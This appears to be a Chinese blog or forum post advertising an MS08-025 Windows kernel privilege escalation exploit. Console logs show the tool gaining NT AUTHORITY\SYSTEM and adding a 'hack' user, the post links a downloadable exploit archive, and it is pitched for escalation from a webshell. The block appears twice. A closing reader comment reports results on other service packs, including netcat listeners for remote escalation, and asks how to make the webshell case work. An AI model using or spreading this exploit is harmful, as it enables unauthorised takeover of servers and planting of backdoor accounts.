Win2k CN SP2 ,Win2k3 CN SP1下測(cè)試通過(guò),其它未測(cè)試(不裝XP那種垃圾)
D:\>whoami
BAICKER-VMWARE\009
D:\>net user hack /add
系統(tǒng)發(fā)生 5 錯(cuò)誤。
拒絕訪問(wèn)。
D:\>ms08025 whoami
MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
By 009, baicker@hotmail.com
TEST OS: WINDOWS 2k SP2 & WINDOWS 2k3 CN SP1
Kernel is \WINNT\System32\ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe ... ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable ... Get ZwVdmControl Number ... ok!
ZwVdmControl Call Number: 000000E8
HookAddress: 80473CB8
[+] Executing Shellcode...
NT AUTHORITY\SYSTEM
D:\>ms08025 "net user hack /add"
MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
By 009, baicker@hotmail.com
TEST OS: WINDOWS 2k3 CN SP1
Kernel is \WINNT\System32\ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe ... ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable ... Get ZwVdmControl Number ... ok!
ZwVdmControl Call Number: 000000E8
HookAddress: 80473CB8
[+] Executing Shellcode...
D:\>命令成功完成。
D:\>net user
\\BAICKER-VMWARE 的用戶帳戶
-------------------------------------------------------------------------------
009 Administrator Guest
hack IUSR_BAICKER-VMWARE IWAM_BAICKER-VMWARE
TsInternetUser
命令成功完成。
D:\>
webshell下提權(quán)

http://www.aygfsteel.com/Files/baicker/ms08025.rar
D:\>whoami
BAICKER-VMWARE\009
D:\>net user hack /add
系統(tǒng)發(fā)生 5 錯(cuò)誤。
拒絕訪問(wèn)。
D:\>ms08025 whoami
MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
By 009, baicker@hotmail.com
TEST OS: WINDOWS 2k SP2 & WINDOWS 2k3 CN SP1
Kernel is \WINNT\System32\ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe ... ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable ... Get ZwVdmControl Number ... ok!
ZwVdmControl Call Number: 000000E8
HookAddress: 80473CB8
[+] Executing Shellcode...
NT AUTHORITY\SYSTEM
D:\>ms08025 "net user hack /add"
MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
By 009, baicker@hotmail.com
TEST OS: WINDOWS 2k3 CN SP1
Kernel is \WINNT\System32\ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe ... ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable ... Get ZwVdmControl Number ... ok!
ZwVdmControl Call Number: 000000E8
HookAddress: 80473CB8
[+] Executing Shellcode...
D:\>命令成功完成。
D:\>net user
\\BAICKER-VMWARE 的用戶帳戶
-------------------------------------------------------------------------------
009 Administrator Guest
hack IUSR_BAICKER-VMWARE IWAM_BAICKER-VMWARE
TsInternetUser
命令成功完成。
D:\>
webshell下提權(quán)

http://www.aygfsteel.com/Files/baicker/ms08025.rar
有良心的HIPS都封了
系統(tǒng)分析是win2000 sp4,win2003 sp0,win2003 sp2
win2003 sp0 => 直接藍(lán)屏了(就不用說(shuō)后面的情況了)
win2003 sp2 =>本地建賬號(hào)(默認(rèn)是users權(quán)限)測(cè)試成功(本地runas測(cè)試)
win2003 sp2 =>本地建賬號(hào)用RUNAS運(yùn)行NC監(jiān)聽,遠(yuǎn)程連接提權(quán)也成功
win2003 sp2=>webshell下用NC監(jiān)聽,遠(yuǎn)程連接提權(quán)失敗
win2000 sp4的情況和win2003 sp2的情況一樣(這里就不細(xì)說(shuō)了)
由于沒有裝win2003 sp1沒有測(cè)試
我想問(wèn)的是為什么在直接建的賬號(hào)的情況下可以提權(quán)成功,而webshell失敗
難道是權(quán)限問(wèn)題(本地建的用戶權(quán)限是users,WEBSHELL的權(quán)限是network)
希望baicker能說(shuō)明一下原因,如何可以成功利用他來(lái)提權(quán)(WEBSHELL)先謝了
還有就是能不能看一下這個(gè)程序的源代碼
好像沒有說(shuō)的那么神吧?